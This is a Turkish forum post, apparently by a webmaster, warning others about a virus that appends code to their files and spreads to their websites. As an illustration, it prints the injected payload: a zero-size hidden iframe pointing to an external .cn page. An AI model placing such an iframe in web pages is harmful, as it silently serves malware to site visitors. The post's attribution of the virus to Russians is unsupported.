SeLaM Arakdashlar,Ruslar bir virüs yapmışlar, bilgisayardaki bütün dosyalarımın en altına bir kod ekleniyor, ve bu dosyalarımı sitelerime upload edince sitenin altında o link çıkıyor ve işlem yapıyor ve haliyle avast ötmeye başlıyor, virüsün bulaşmadığı akradashlar aman dikkat etsinler hele hele webmasterlarsa daha çok dikkat etsinler, benim binlerce dosyama bulaştı virüs, aşağıdaki kod sakın tıklamayın görün diye veriyorum;

<iframe src="http://www.ac66.cn/88/index.htm" width="0" height="0" frameborder="0"></iframe>

işin acayip yanı virüsü siliyorum ama dw veya frontpage ile bi çalışma yapacağım vakit yine çıkıyor, system32 klasöründe upload die bi klasör oluşturuyor, silsende yine geliyor, çünkü yavaş yavaş diğer sitelere de yayılmaya başladı, pc lerinde zone alarmı olanlar ikide bir uyarı alabilirler.